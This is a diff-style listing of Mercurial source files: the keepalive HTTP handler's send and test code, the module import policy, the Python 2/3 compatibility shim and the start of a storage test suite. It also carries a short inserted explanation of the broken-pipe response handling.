641 641 # the socket. we want to reconnect when somebody tries to send again.
642 642 #
643 643 # NOTE: we DO propagate the error, though, because we cannot simply
644 644 # ignore the error... the caller will know if they can retry.
645 645 if self.debuglevel > 0:
646 646 print(b"send:", repr(str))
647 647 try:
648 648 blocksize = 8192
649 649 read = getattr(str, 'read', None)
650 650 if read is not None:
651 651 if self.debuglevel > 0:
652 652 print(b"sending a read()able")
653 653 data = read(blocksize)
654 654 while data:
655 655 self.sock.sendall(data)
656 656 self.sentbytescount += len(data)
657 657 data = read(blocksize)
658 658 else:
659 659 self.sock.sendall(str)
660 660 self.sentbytescount += len(str)
661 661 except socket.error as v:
662 662 reraise = True
663 663 if v.args[0] == errno.EPIPE: # Broken pipe
664 664 if self._HTTPConnection__state == httplib._CS_REQ_SENT:
665 665 self._broken_pipe_resp = None
666 666 self._broken_pipe_resp = self.getresponse()
667 667 reraise = False
668 668 self.close()
669 669 if reraise:
670 670 raise
671 671
672 672
673 673 def wrapgetresponse(cls):
674 674 """Wraps getresponse in cls with a broken-pipe sane version.
675 675 """
676 676
677 677 def safegetresponse(self):
678 678 # In safesend() we might set the _broken_pipe_resp
679 679 # attribute, in which case the socket has already
680 680 # been closed and we just need to give them the response
681 681 # back. Otherwise, we use the normal response path.
682 682 r = getattr(self, '_broken_pipe_resp', None)
683 683 if r is not None:
684 684 return r
685 685 return cls.getresponse(self)
686 686
687 687 safegetresponse.__doc__ = cls.getresponse.__doc__
688 688 return safegetresponse
689 689
690 690
691 691 class HTTPConnection(httplib.HTTPConnection):
692 692 # url.httpsconnection inherits from this. So when adding/removing
693 693 # attributes, be sure to audit httpsconnection() for unintended
694 694 # consequences.
695 695
696 696 # use the modified response class
697 697 response_class = HTTPResponse
698 698 send = safesend
699 699 getresponse = wrapgetresponse(httplib.HTTPConnection)
700 700
701 701 def __init__(self, *args, **kwargs):
702 702 httplib.HTTPConnection.__init__(self, *args, **kwargs)
703 703 self.sentbytescount = 0
704 704 self.receivedbytescount = 0
705 705
706 706
707 707 #########################################################################
708 708 ##### TEST FUNCTIONS
709 709 #########################################################################
710 710
711 711
712 712 def continuity(url):
713 713 md5 = hashlib.md5
714 714 format = b'%25s: %s'
715 715
716 716 # first fetch the file with the normal http handler
717 717 opener = urlreq.buildopener()
718 718 urlreq.installopener(opener)
719 719 fo = urlreq.urlopen(url)
720 720 foo = fo.read()
721 721 fo.close()
722 722 m = md5(foo)
723 723 print(format % (b'normal urllib', node.hex(m.digest())))
724 724
725 725 # now install the keepalive handler and try again
726 726 opener = urlreq.buildopener(HTTPHandler())
727 727 urlreq.installopener(opener)
728 728
729 729 fo = urlreq.urlopen(url)
730 730 foo = fo.read()
731 731 fo.close()
732 732 m = md5(foo)
733 733 print(format % (b'keepalive read', node.hex(m.digest())))
734 734
735 735 fo = urlreq.urlopen(url)
736 736 foo = b''
737 737 while True:
738 738 f = fo.readline()
739 739 if f:
740 740 foo = foo + f
741 741 else:
742 742 break
743 743 fo.close()
744 744 m = md5(foo)
745 745 print(format % (b'keepalive readline', node.hex(m.digest())))
746 746
747 747
748 748 def comp(N, url):
749 749 print(b' making %i connections to:\n %s' % (N, url))
750 750
751 751 procutil.stdout.write(b' first using the normal urllib handlers')
752 752 # first use normal opener
753 753 opener = urlreq.buildopener()
754 754 urlreq.installopener(opener)
755 755 t1 = fetch(N, url)
756 756 print(b' TIME: %.3f s' % t1)
757 757
758 758 procutil.stdout.write(b' now using the keepalive handler ')
759 759 # now install the keepalive handler and try again
760 760 opener = urlreq.buildopener(HTTPHandler())
761 761 urlreq.installopener(opener)
762 762 t2 = fetch(N, url)
763 763 print(b' TIME: %.3f s' % t2)
764 764 print(b' improvement factor: %.2f' % (t1 / t2))
765 765
766 766
767 767 def fetch(N, url, delay=0):
768 768 import time
769 769
770 770 lens = []
771 771 starttime = time.time()
772 772 for i in range(N):
773 773 if delay and i > 0:
774 774 time.sleep(delay)
775 775 fo = urlreq.urlopen(url)
776 776 foo = fo.read()
777 777 fo.close()
778 778 lens.append(len(foo))
779 779 diff = time.time() - starttime
780 780
781 781 j = 0
782 782 for i in lens[1:]:
783 783 j = j + 1
784 784 if not i == lens[0]:
785 785 print(b"WARNING: inconsistent length on read %i: %i" % (j, i))
786 786
787 787 return diff
788 788
789 789
790 790 def test_timeout(url):
791 791 global DEBUG
792 792 dbbackup = DEBUG
793 793
794 794 class FakeLogger(object):
795 795 def debug(self, msg, *args):
796 796 print(msg % args)
797 797
798 798 info = warning = error = debug
799 799
800 800 DEBUG = FakeLogger()
801 801 print(b" fetching the file to establish a connection")
802 802 fo = urlreq.urlopen(url)
803 803 data1 = fo.read()
804 804 fo.close()
805 805
806 806 i = 20
807 807 print(b" waiting %i seconds for the server to close the connection" % i)
808 808 while i > 0:
809 809 procutil.stdout.write(b'\r %2i' % i)
810 810 procutil.stdout.flush()
811 811 time.sleep(1)
812 812 i -= 1
813 813 procutil.stderr.write(b'\r')
814 814
815 815 print(b" fetching the file a second time")
816 816 fo = urlreq.urlopen(url)
817 817 data2 = fo.read()
818 818 fo.close()
819 819
820 820 if data1 == data2:
821 821 print(b' data are identical')
822 822 else:
823 823 print(b' ERROR: DATA DIFFER')
824 824
825 825 DEBUG = dbbackup
826 826
827 827
828 828 def test(url, N=10):
829 829 print(b"performing continuity test (making sure stuff isn't corrupted)")
830 830 continuity(url)
831 831 print(b'')
832 832 print(b"performing speed comparison")
833 833 comp(N, url)
834 834 print(b'')
835 835 print(b"performing dropped-connection check")
836 836 test_timeout(url)
837 837
838 838
839 839 if __name__ == '__main__':
840 840 import time
841 841
842 842 try:
843 843 N = int(sys.argv[1])
844 844 url = sys.argv[2]
845 845 except (IndexError, ValueError):
846 846 print(b"%s <integer> <url>" % sys.argv[0])
847 847 else:
848 848 test(url, N)
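Worth calling out from the file above: safesend() and wrapgetresponse() together implement a recovery trick — if the server breaks the pipe mid-upload but has already answered, the response is captured and replayed instead of being lost. A hedged standalone sketch of just that idea (class and attribute names here are ours, and it leans on http.client's private _CS_REQ_SENT constant; Mercurial's real version patches the send path shown above instead of subclassing):

    import errno
    import socket
    from http.client import HTTPConnection, _CS_REQ_SENT

    class earlyresponseconnection(HTTPConnection):
        # Stash a response the server sent before hanging up on us.
        def send(self, data):
            if getattr(self, '_early_resp', None) is not None:
                return  # pretend to send; the answer is already in hand
            try:
                HTTPConnection.send(self, data)
            except socket.error as v:
                if (v.args[0] == errno.EPIPE
                        and self._HTTPConnection__state == _CS_REQ_SENT):
                    self._early_resp = HTTPConnection.getresponse(self)
                self.close()
                if getattr(self, '_early_resp', None) is None:
                    raise

        def getresponse(self):
            r = getattr(self, '_early_resp', None)
            if r is not None:
                self._early_resp = None
                return r
            return HTTPConnection.getresponse(self)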
@@ -1,157 +1,157
1 1 # policy.py - module policy logic for Mercurial.
2 2 #
3 3 # Copyright 2015 Gregory Szorc <gregory.szorc@gmail.com>
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7 7
8 8 from __future__ import absolute_import
9 9
10 10 import os
11 11 import sys
12 12
13 13 from .pycompat import getattr
14 14
15 15 # Rules for how modules can be loaded. Values are:
16 16 #
17 17 # c - require C extensions
18 18 # rust+c - require Rust and C extensions
19 19 # rust+c-allow - allow Rust and C extensions with fallback to pure Python
20 20 # for each
21 21 # allow - allow pure Python implementation when C loading fails
22 22 # cffi - required cffi versions (implemented within pure module)
23 23 # cffi-allow - allow pure Python implementation if cffi version is missing
24 24 # py - only load pure Python modules
25 25 #
26 26 # By default, fall back to the pure modules so the in-place build can
27 27 # run without recompiling the C extensions. This will be overridden by
28 28 # __modulepolicy__ generated by setup.py.
29 29 policy = b'allow'
30 30 _packageprefs = {
31 31 # policy: (versioned package, pure package)
32 32 b'c': (r'cext', None),
33 33 b'allow': (r'cext', r'pure'),
34 34 b'cffi': (r'cffi', None),
35 35 b'cffi-allow': (r'cffi', r'pure'),
36 36 b'py': (None, r'pure'),
37 37 # For now, rust policies impact importrust only
38 38 b'rust+c': (r'cext', None),
39 39 b'rust+c-allow': (r'cext', r'pure'),
40 40 }
41 41
42 42 try:
43 43 from . import __modulepolicy__
44 44
45 45 policy = __modulepolicy__.modulepolicy
46 46 except ImportError:
47 47 pass
48 48
49 49 # PyPy doesn't load C extensions.
50 50 #
51 51 # The canonical way to do this is to test platform.python_implementation().
52 52 # But we don't import platform here, to avoid bloating startup for this check.
53 53 if r'__pypy__' in sys.builtin_module_names:
54 54 policy = b'cffi'
55 55
56 56 # Environment variable can always force settings.
57 57 if sys.version_info[0] >= 3:
58 58 if r'HGMODULEPOLICY' in os.environ:
59 59 policy = os.environ[r'HGMODULEPOLICY'].encode(r'utf-8')
60 60 else:
61 61 policy = os.environ.get(r'HGMODULEPOLICY', policy)
62 62
63 63
64 64 def _importfrom(pkgname, modname):
65 65 # from .<pkgname> import <modname> (where . is looked through this module)
66 66 fakelocals = {}
67 67 pkg = __import__(pkgname, globals(), fakelocals, [modname], level=1)
68 68 try:
69 69 fakelocals[modname] = mod = getattr(pkg, modname)
70 70 except AttributeError:
71 71 raise ImportError(r'cannot import name %s' % modname)
72 72 # force import; fakelocals[modname] may be replaced with the real module
73 getattr(mod, r'__doc__', None)
73 getattr(mod, '__doc__', None)
74 74 return fakelocals[modname]
75 75
76 76
77 77 # keep in sync with "version" in C modules
78 78 _cextversions = {
79 79 (r'cext', r'base85'): 1,
80 80 (r'cext', r'bdiff'): 3,
81 81 (r'cext', r'mpatch'): 1,
82 82 (r'cext', r'osutil'): 4,
83 83 (r'cext', r'parsers'): 13,
84 84 }
85 85
86 86 # map import request to other package or module
87 87 _modredirects = {
88 88 (r'cext', r'charencode'): (r'cext', r'parsers'),
89 89 (r'cffi', r'base85'): (r'pure', r'base85'),
90 90 (r'cffi', r'charencode'): (r'pure', r'charencode'),
91 91 (r'cffi', r'parsers'): (r'pure', r'parsers'),
92 92 }
93 93
94 94
95 95 def _checkmod(pkgname, modname, mod):
96 96 expected = _cextversions.get((pkgname, modname))
97 actual = getattr(mod, r'version', None)
97 actual = getattr(mod, 'version', None)
98 98 if actual != expected:
99 99 raise ImportError(
100 100 r'cannot import module %s.%s '
101 101 r'(expected version: %d, actual: %r)'
102 102 % (pkgname, modname, expected, actual)
103 103 )
104 104
105 105
106 106 def importmod(modname):
107 107 """Import module according to policy and check API version"""
108 108 try:
109 109 verpkg, purepkg = _packageprefs[policy]
110 110 except KeyError:
111 111 raise ImportError(r'invalid HGMODULEPOLICY %r' % policy)
112 112 assert verpkg or purepkg
113 113 if verpkg:
114 114 pn, mn = _modredirects.get((verpkg, modname), (verpkg, modname))
115 115 try:
116 116 mod = _importfrom(pn, mn)
117 117 if pn == verpkg:
118 118 _checkmod(pn, mn, mod)
119 119 return mod
120 120 except ImportError:
121 121 if not purepkg:
122 122 raise
123 123 pn, mn = _modredirects.get((purepkg, modname), (purepkg, modname))
124 124 return _importfrom(pn, mn)
125 125
126 126
127 127 def _isrustpermissive():
128 128 """Assuming the policy is a Rust one, tell if it's permissive."""
129 129 return policy.endswith(b'-allow')
130 130
131 131
132 132 def importrust(modname, member=None, default=None):
133 133 """Import Rust module according to policy and availability.
134 134
135 135 If policy isn't a Rust one, this returns `default`.
136 136
137 137 If either the module or its member is not available, this returns `default`
138 138 if policy is permissive and raises `ImportError` if not.
139 139 """
140 140 if not policy.startswith(b'rust'):
141 141 return default
142 142
143 143 try:
144 144 mod = _importfrom(r'rustext', modname)
145 145 except ImportError:
146 146 if _isrustpermissive():
147 147 return default
148 148 raise
149 149 if member is None:
150 150 return mod
151 151
152 152 try:
153 153 return getattr(mod, member)
154 154 except AttributeError:
155 155 if _isrustpermissive():
156 156 return default
157 157 raise ImportError(r"Cannot import name %s" % member)
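A hedged usage sketch of the machinery above, as a caller sees it (module names taken from the version and redirect tables; which implementation loads depends on the build and HGMODULEPOLICY):

    from mercurial import policy

    # Loads mercurial.cext.parsers when C extensions are available and
    # the policy allows them; otherwise falls back to the pure version.
    parsers = policy.importmod('parsers')

    # Rust is opt-in via the rust+c policies; importrust() returns the
    # default (None here) under a non-Rust policy.
    ancestor = policy.importrust('ancestor')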
@@ -1,450 +1,450
1 1 # pycompat.py - portability shim for python 3
2 2 #
3 3 # This software may be used and distributed according to the terms of the
4 4 # GNU General Public License version 2 or any later version.
5 5
6 6 """Mercurial portability shim for python 3.
7 7
8 8 This contains aliases to hide python version-specific details from the core.
9 9 """
10 10
11 11 from __future__ import absolute_import
12 12
13 13 import getopt
14 14 import inspect
15 15 import os
16 16 import shlex
17 17 import sys
18 18 import tempfile
19 19
20 20 ispy3 = sys.version_info[0] >= 3
21 21 ispypy = r'__pypy__' in sys.builtin_module_names
22 22
23 23 if not ispy3:
24 24 import cookielib
25 25 import cPickle as pickle
26 26 import httplib
27 27 import Queue as queue
28 28 import SocketServer as socketserver
29 29 import xmlrpclib
30 30
31 31 from .thirdparty.concurrent import futures
32 32
33 33 def future_set_exception_info(f, exc_info):
34 34 f.set_exception_info(*exc_info)
35 35
36 36
37 37 else:
38 38 import concurrent.futures as futures
39 39 import http.cookiejar as cookielib
40 40 import http.client as httplib
41 41 import pickle
42 42 import queue as queue
43 43 import socketserver
44 44 import xmlrpc.client as xmlrpclib
45 45
46 46 def future_set_exception_info(f, exc_info):
47 47 f.set_exception(exc_info[0])
48 48
49 49
50 50 def identity(a):
51 51 return a
52 52
53 53
54 54 def _rapply(f, xs):
55 55 if xs is None:
56 56 # assume None means non-value of optional data
57 57 return xs
58 58 if isinstance(xs, (list, set, tuple)):
59 59 return type(xs)(_rapply(f, x) for x in xs)
60 60 if isinstance(xs, dict):
61 61 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
62 62 return f(xs)
63 63
64 64
65 65 def rapply(f, xs):
66 66 """Apply function recursively to every item preserving the data structure
67 67
68 68 >>> def f(x):
69 69 ... return 'f(%s)' % x
70 70 >>> rapply(f, None) is None
71 71 True
72 72 >>> rapply(f, 'a')
73 73 'f(a)'
74 74 >>> rapply(f, {'a'}) == {'f(a)'}
75 75 True
76 76 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
77 77 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
78 78
79 79 >>> xs = [object()]
80 80 >>> rapply(identity, xs) is xs
81 81 True
82 82 """
83 83 if f is identity:
84 84 # fast path mainly for py2
85 85 return xs
86 86 return _rapply(f, xs)
87 87
88 88
89 89 if ispy3:
90 90 import builtins
91 91 import functools
92 92 import io
93 93 import struct
94 94
95 95 fsencode = os.fsencode
96 96 fsdecode = os.fsdecode
97 97 oscurdir = os.curdir.encode('ascii')
98 98 oslinesep = os.linesep.encode('ascii')
99 99 osname = os.name.encode('ascii')
100 100 ospathsep = os.pathsep.encode('ascii')
101 101 ospardir = os.pardir.encode('ascii')
102 102 ossep = os.sep.encode('ascii')
103 103 osaltsep = os.altsep
104 104 if osaltsep:
105 105 osaltsep = osaltsep.encode('ascii')
106 106
107 107 sysplatform = sys.platform.encode('ascii')
108 108 sysexecutable = sys.executable
109 109 if sysexecutable:
110 110 sysexecutable = os.fsencode(sysexecutable)
111 111 bytesio = io.BytesIO
112 112 # TODO deprecate stringio name, as it is a lie on Python 3.
113 113 stringio = bytesio
114 114
115 115 def maplist(*args):
116 116 return list(map(*args))
117 117
118 118 def rangelist(*args):
119 119 return list(range(*args))
120 120
121 121 def ziplist(*args):
122 122 return list(zip(*args))
123 123
124 124 rawinput = input
125 125 getargspec = inspect.getfullargspec
126 126
127 127 long = int
128 128
129 129 # TODO: .buffer might not exist if std streams were replaced; we'll need
130 130 # a silly wrapper to make a bytes stream backed by a unicode one.
131 131 stdin = sys.stdin.buffer
132 132 stdout = sys.stdout.buffer
133 133 stderr = sys.stderr.buffer
134 134
135 135 # Since Python 3 converts argv to wchar_t type by Py_DecodeLocale() on Unix,
136 136 # we can use os.fsencode() to get back bytes argv.
137 137 #
138 138 # https://hg.python.org/cpython/file/v3.5.1/Programs/python.c#l55
139 139 #
140 140 # TODO: On Windows, the native argv is wchar_t, so we'll need a different
141 141 # workaround to simulate the Python 2 (i.e. ANSI Win32 API) behavior.
142 142 if getattr(sys, 'argv', None) is not None:
143 143 sysargv = list(map(os.fsencode, sys.argv))
144 144
145 145 bytechr = struct.Struct(r'>B').pack
146 146 byterepr = b'%r'.__mod__
147 147
148 148 class bytestr(bytes):
149 149 """A bytes which mostly acts as a Python 2 str
150 150
151 151 >>> bytestr(), bytestr(bytearray(b'foo')), bytestr(u'ascii'), bytestr(1)
152 152 ('', 'foo', 'ascii', '1')
153 153 >>> s = bytestr(b'foo')
154 154 >>> assert s is bytestr(s)
155 155
156 156 __bytes__() should be called if provided:
157 157
158 158 >>> class bytesable(object):
159 159 ... def __bytes__(self):
160 160 ... return b'bytes'
161 161 >>> bytestr(bytesable())
162 162 'bytes'
163 163
164 164 There's no implicit conversion from non-ascii str as its encoding is
165 165 unknown:
166 166
167 167 >>> bytestr(chr(0x80)) # doctest: +ELLIPSIS
168 168 Traceback (most recent call last):
169 169 ...
170 170 UnicodeEncodeError: ...
171 171
172 172 Comparison between bytestr and bytes should work:
173 173
174 174 >>> assert bytestr(b'foo') == b'foo'
175 175 >>> assert b'foo' == bytestr(b'foo')
176 176 >>> assert b'f' in bytestr(b'foo')
177 177 >>> assert bytestr(b'f') in b'foo'
178 178
179 179 Sliced elements should be bytes, not integer:
180 180
181 181 >>> s[1], s[:2]
182 182 (b'o', b'fo')
183 183 >>> list(s), list(reversed(s))
184 184 ([b'f', b'o', b'o'], [b'o', b'o', b'f'])
185 185
186 186 As bytestr type isn't propagated across operations, you need to cast
187 187 bytes to bytestr explicitly:
188 188
189 189 >>> s = bytestr(b'foo').upper()
190 190 >>> t = bytestr(s)
191 191 >>> s[0], t[0]
192 192 (70, b'F')
193 193
194 194 Be careful to not pass a bytestr object to a function which expects
195 195 bytearray-like behavior.
196 196
197 197 >>> t = bytes(t) # cast to bytes
198 198 >>> assert type(t) is bytes
199 199 """
200 200
201 201 def __new__(cls, s=b''):
202 202 if isinstance(s, bytestr):
203 203 return s
204 204 if not isinstance(
205 205 s, (bytes, bytearray)
206 206 ) and not hasattr( # hasattr-py3-only
207 207 s, u'__bytes__'
208 208 ):
209 209 s = str(s).encode('ascii')
210 210 return bytes.__new__(cls, s)
211 211
212 212 def __getitem__(self, key):
213 213 s = bytes.__getitem__(self, key)
214 214 if not isinstance(s, bytes):
215 215 s = bytechr(s)
216 216 return s
217 217
218 218 def __iter__(self):
219 219 return iterbytestr(bytes.__iter__(self))
220 220
221 221 def __repr__(self):
222 222 return bytes.__repr__(self)[1:] # drop b''
223 223
224 224 def iterbytestr(s):
225 225 """Iterate bytes as if it were a str object of Python 2"""
226 226 return map(bytechr, s)
227 227
228 228 def maybebytestr(s):
229 229 """Promote bytes to bytestr"""
230 230 if isinstance(s, bytes):
231 231 return bytestr(s)
232 232 return s
233 233
234 234 def sysbytes(s):
235 235 """Convert an internal str (e.g. keyword, __doc__) back to bytes
236 236
237 237 This never raises UnicodeEncodeError, but only ASCII characters
238 238 can be round-trip by sysstr(sysbytes(s)).
239 239 """
240 240 return s.encode('utf-8')
241 241
242 242 def sysstr(s):
243 243 """Return a keyword str to be passed to Python functions such as
244 244 getattr() and str.encode()
245 245
246 246 This never raises UnicodeDecodeError. Non-ascii characters are
247 247 considered invalid and mapped to arbitrary but unique code points
248 248 such that 'sysstr(a) != sysstr(b)' for all 'a != b'.
249 249 """
250 250 if isinstance(s, builtins.str):
251 251 return s
252 252 return s.decode('latin-1')
253 253
254 254 def strurl(url):
255 255 """Converts a bytes url back to str"""
256 256 if isinstance(url, bytes):
257 257 return url.decode('ascii')
258 258 return url
259 259
260 260 def bytesurl(url):
261 261 """Converts a str url to bytes by encoding in ascii"""
262 262 if isinstance(url, str):
263 263 return url.encode('ascii')
264 264 return url
265 265
266 266 def raisewithtb(exc, tb):
267 267 """Raise exception with the given traceback"""
268 268 raise exc.with_traceback(tb)
269 269
270 270 def getdoc(obj):
271 271 """Get docstring as bytes; may be None so gettext() won't confuse it
272 272 with _('')"""
273 doc = getattr(obj, u'__doc__', None)
273 doc = getattr(obj, '__doc__', None)
274 274 if doc is None:
275 275 return doc
276 276 return sysbytes(doc)
277 277
278 278 def _wrapattrfunc(f):
279 279 @functools.wraps(f)
280 280 def w(object, name, *args):
281 281 return f(object, sysstr(name), *args)
282 282
283 283 return w
284 284
285 285 # these wrappers are automagically imported by hgloader
286 286 delattr = _wrapattrfunc(builtins.delattr)
287 287 getattr = _wrapattrfunc(builtins.getattr)
288 288 hasattr = _wrapattrfunc(builtins.hasattr)
289 289 setattr = _wrapattrfunc(builtins.setattr)
290 290 xrange = builtins.range
291 291 unicode = str
292 292
293 293 def open(name, mode=b'r', buffering=-1, encoding=None):
294 294 return builtins.open(name, sysstr(mode), buffering, encoding)
295 295
296 296 safehasattr = _wrapattrfunc(builtins.hasattr)
297 297
298 298 def _getoptbwrapper(orig, args, shortlist, namelist):
299 299 """
300 300 Takes bytes arguments, converts them to unicode, passes them to
301 301 getopt.getopt(), converts the returned values back to bytes and then
302 302 returns them, for Python 3 compatibility, as getopt.getopt() doesn't
303 303 accept bytes on Python 3.
304 304 """
305 305 args = [a.decode('latin-1') for a in args]
306 306 shortlist = shortlist.decode('latin-1')
307 307 namelist = [a.decode('latin-1') for a in namelist]
308 308 opts, args = orig(args, shortlist, namelist)
309 309 opts = [(a[0].encode('latin-1'), a[1].encode('latin-1')) for a in opts]
310 310 args = [a.encode('latin-1') for a in args]
311 311 return opts, args
312 312
313 313 def strkwargs(dic):
314 314 """
315 315 Converts the keys of a Python dictionary to str (i.e. unicode) so that
316 316 they can be passed as keyword arguments, as dictionaries with bytes
317 317 keys can't be passed as keyword arguments to functions on Python 3.
318 318 """
319 319 dic = dict((k.decode('latin-1'), v) for k, v in dic.iteritems())
320 320 return dic
321 321
322 322 def byteskwargs(dic):
323 323 """
324 324 Converts the keys of a Python dictionary back to bytes, reversing the
325 325 str conversion done to pass the dictionary as keyword arguments on Python 3.
326 326 """
327 327 dic = dict((k.encode('latin-1'), v) for k, v in dic.iteritems())
328 328 return dic
329 329
330 330 # TODO: handle shlex.shlex().
331 331 def shlexsplit(s, comments=False, posix=True):
332 332 """
333 333 Takes a bytes argument, converts it to str (i.e. unicode), passes it to
334 334 shlex.split(), converts the returned value back to bytes and returns it,
335 335 for Python 3 compatibility, as shlex.split() doesn't accept bytes on Python 3.
336 336 """
337 337 ret = shlex.split(s.decode('latin-1'), comments, posix)
338 338 return [a.encode('latin-1') for a in ret]
339 339
340 340
341 341 else:
342 342 import cStringIO
343 343
344 344 xrange = xrange
345 345 unicode = unicode
346 346 bytechr = chr
347 347 byterepr = repr
348 348 bytestr = str
349 349 iterbytestr = iter
350 350 maybebytestr = identity
351 351 sysbytes = identity
352 352 sysstr = identity
353 353 strurl = identity
354 354 bytesurl = identity
355 355 open = open
356 356 delattr = delattr
357 357 getattr = getattr
358 358 hasattr = hasattr
359 359 setattr = setattr
360 360
361 361 # this can't be parsed on Python 3
362 362 exec(b'def raisewithtb(exc, tb):\n' b' raise exc, None, tb\n')
363 363
364 364 def fsencode(filename):
365 365 """
366 366 Partial backport from os.py in Python 3, which only accepts bytes.
367 367 In Python 2, our paths should only ever be bytes; a unicode path
368 368 indicates a bug.
369 369 """
370 370 if isinstance(filename, str):
371 371 return filename
372 372 else:
373 373 raise TypeError(r"expect str, not %s" % type(filename).__name__)
374 374
375 375 # In Python 2, fsdecode() is very likely to receive bytes. So it's
376 376 # better not to touch the Python 2 part, as it's already working fine.
377 377 fsdecode = identity
378 378
379 379 def getdoc(obj):
380 380 return getattr(obj, '__doc__', None)
381 381
382 382 _notset = object()
383 383
384 384 def safehasattr(thing, attr):
385 385 return getattr(thing, attr, _notset) is not _notset
386 386
387 387 def _getoptbwrapper(orig, args, shortlist, namelist):
388 388 return orig(args, shortlist, namelist)
389 389
390 390 strkwargs = identity
391 391 byteskwargs = identity
392 392
393 393 oscurdir = os.curdir
394 394 oslinesep = os.linesep
395 395 osname = os.name
396 396 ospathsep = os.pathsep
397 397 ospardir = os.pardir
398 398 ossep = os.sep
399 399 osaltsep = os.altsep
400 400 long = long
401 401 stdin = sys.stdin
402 402 stdout = sys.stdout
403 403 stderr = sys.stderr
404 404 if getattr(sys, 'argv', None) is not None:
405 405 sysargv = sys.argv
406 406 sysplatform = sys.platform
407 407 sysexecutable = sys.executable
408 408 shlexsplit = shlex.split
409 409 bytesio = cStringIO.StringIO
410 410 stringio = bytesio
411 411 maplist = map
412 412 rangelist = range
413 413 ziplist = zip
414 414 rawinput = raw_input
415 415 getargspec = inspect.getargspec
416 416
417 417 isjython = sysplatform.startswith(b'java')
418 418
419 419 isdarwin = sysplatform.startswith(b'darwin')
420 420 islinux = sysplatform.startswith(b'linux')
421 421 isposix = osname == b'posix'
422 422 iswindows = osname == b'nt'
423 423
424 424
425 425 def getoptb(args, shortlist, namelist):
426 426 return _getoptbwrapper(getopt.getopt, args, shortlist, namelist)
427 427
428 428
429 429 def gnugetoptb(args, shortlist, namelist):
430 430 return _getoptbwrapper(getopt.gnu_getopt, args, shortlist, namelist)
431 431
432 432
433 433 def mkdtemp(suffix=b'', prefix=b'tmp', dir=None):
434 434 return tempfile.mkdtemp(suffix, prefix, dir)
435 435
436 436
437 437 # text=True is not supported; use util.from/tonativeeol() instead
438 438 def mkstemp(suffix=b'', prefix=b'tmp', dir=None):
439 439 return tempfile.mkstemp(suffix, prefix, dir)
440 440
441 441
442 442 # mode must include 'b'ytes as encoding= is not supported
443 443 def namedtempfile(
444 444 mode=b'w+b', bufsize=-1, suffix=b'', prefix=b'tmp', dir=None, delete=True
445 445 ):
446 446 mode = sysstr(mode)
447 447 assert r'b' in mode
448 448 return tempfile.NamedTemporaryFile(
449 449 mode, bufsize, suffix=suffix, prefix=prefix, dir=dir, delete=delete
450 450 )
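# A hedged usage sketch (suffix and payload are made up):
#   with namedtempfile(suffix=b'.tmp') as fp:
#       fp.write(b'payload')  # bytes mode is enforced by the assert above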
@@ -1,1391 +1,1391
1 1 # storage.py - Testing of storage primitives.
2 2 #
3 3 # Copyright 2018 Gregory Szorc <gregory.szorc@gmail.com>
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7 7
8 8 from __future__ import absolute_import
9 9
10 10 import unittest
11 11
12 12 from ..node import (
13 13 hex,
14 14 nullid,
15 15 nullrev,
16 16 )
17 17 from ..pycompat import getattr
18 18 from .. import (
19 19 error,
20 20 mdiff,
21 21 )
22 22 from ..interfaces import repository
23 23 from ..utils import storageutil
24 24
25 25
26 26 class basetestcase(unittest.TestCase):
27 if not getattr(unittest.TestCase, r'assertRaisesRegex', False):
27 if not getattr(unittest.TestCase, 'assertRaisesRegex', False):
28 28 assertRaisesRegex = ( # camelcase-required
29 29 unittest.TestCase.assertRaisesRegexp
30 30 )
31 31
32 32
33 33 class ifileindextests(basetestcase):
34 34 """Generic tests for the ifileindex interface.
35 35
36 36 All file storage backends for index data should conform to the tests in this
37 37 class.
38 38
39 39 Use ``makeifileindextests()`` to create an instance of this type.
40 40 """
41 41
42 42 def testempty(self):
43 43 f = self._makefilefn()
44 44 self.assertEqual(len(f), 0, b'new file store has 0 length by default')
45 45 self.assertEqual(list(f), [], b'iter yields nothing by default')
46 46
47 47 gen = iter(f)
48 48 with self.assertRaises(StopIteration):
49 49 next(gen)
50 50
51 51 self.assertFalse(f.hasnode(None))
52 52 self.assertFalse(f.hasnode(0))
53 53 self.assertFalse(f.hasnode(nullrev))
54 54 self.assertFalse(f.hasnode(nullid))
55 55 self.assertFalse(f.hasnode(b'0'))
56 56 self.assertFalse(f.hasnode(b'a' * 20))
57 57
58 58 # revs() should evaluate to an empty list.
59 59 self.assertEqual(list(f.revs()), [])
60 60
61 61 revs = iter(f.revs())
62 62 with self.assertRaises(StopIteration):
63 63 next(revs)
64 64
65 65 self.assertEqual(list(f.revs(start=20)), [])
66 66
67 67 # parents() and parentrevs() work with nullid/nullrev.
68 68 self.assertEqual(f.parents(nullid), (nullid, nullid))
69 69 self.assertEqual(f.parentrevs(nullrev), (nullrev, nullrev))
70 70
71 71 with self.assertRaises(error.LookupError):
72 72 f.parents(b'\x01' * 20)
73 73
74 74 for i in range(-5, 5):
75 75 if i == nullrev:
76 76 continue
77 77
78 78 with self.assertRaises(IndexError):
79 79 f.parentrevs(i)
80 80
81 81 # nullid/nullrev lookup always works.
82 82 self.assertEqual(f.rev(nullid), nullrev)
83 83 self.assertEqual(f.node(nullrev), nullid)
84 84
85 85 with self.assertRaises(error.LookupError):
86 86 f.rev(b'\x01' * 20)
87 87
88 88 for i in range(-5, 5):
89 89 if i == nullrev:
90 90 continue
91 91
92 92 with self.assertRaises(IndexError):
93 93 f.node(i)
94 94
95 95 self.assertEqual(f.lookup(nullid), nullid)
96 96 self.assertEqual(f.lookup(nullrev), nullid)
97 97 self.assertEqual(f.lookup(hex(nullid)), nullid)
98 98 self.assertEqual(f.lookup(b'%d' % nullrev), nullid)
99 99
100 100 with self.assertRaises(error.LookupError):
101 101 f.lookup(b'badvalue')
102 102
103 103 with self.assertRaises(error.LookupError):
104 104 f.lookup(hex(nullid)[0:12])
105 105
106 106 with self.assertRaises(error.LookupError):
107 107 f.lookup(b'-2')
108 108
109 109 with self.assertRaises(error.LookupError):
110 110 f.lookup(b'0')
111 111
112 112 with self.assertRaises(error.LookupError):
113 113 f.lookup(b'1')
114 114
115 115 with self.assertRaises(error.LookupError):
116 116 f.lookup(b'11111111111111111111111111111111111111')
117 117
118 118 for i in range(-5, 5):
119 119 if i == nullrev:
120 120 continue
121 121
